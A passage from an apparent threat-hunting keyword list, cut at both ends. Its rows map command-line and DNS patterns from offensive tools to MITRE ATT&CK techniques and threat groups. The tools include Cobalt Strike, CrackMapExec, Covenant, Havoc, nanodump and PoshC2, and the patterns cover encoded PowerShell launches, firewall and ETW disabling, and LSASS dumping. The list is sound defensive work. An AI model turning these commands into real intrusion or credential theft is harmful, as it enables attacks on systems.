Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"\NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"\Posh*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"afrog -*","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","0","N/A","N/A","10","2135","272","2023-09-28T09:41:46Z","2022-02-24T06:00:32Z" +"BypassUAC *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"capinfos -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"captype -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"cd PayGen","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A",,"N/A",,, +"certipy *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"chkconfig off ip6tables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"chkconfig off iptables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc *","greyware_tool_keyword","powershell","Jenkins Abuse Without admin access","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"cme smb -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"dcenum *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"delete_file *.dll","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"detect-hooks","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"doc.1a.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc.4a.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc.bc.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc.md.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc.po.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc.tx.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc-stg-prepend*.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc-stg-sh*.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"dumpwifi *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"etw stop","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"EVUAC *","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","0","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"exploit -j -z","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"fw_walk display*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"fw_walk status*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"fw_walk total*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"Get-ADComputer -Filter {TrustedForDelegation -eq $True}","greyware_tool_keyword","powershell","AD Module Enumerate computers with Unconstrained Delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADGroup -Filter *Name -like *admin*","greyware_tool_keyword","powershell","AD Module Search for a particular string in attributes (admin)","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADObject -Filter {msDS-AllowedToDelegateTo * -Properties msDS-AllowedToDelegateTo*","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADObject -SearchBase *CN=Shadow Principal Configuration*CN=Services* (Get-ADRootDSE).configurationNamingContext) | select *msDS-ShadowPrincipalSid*","greyware_tool_keyword","powershell","Enumerate shadow security principals mapped to a high priv group","T1069.002 - T1087.002 - 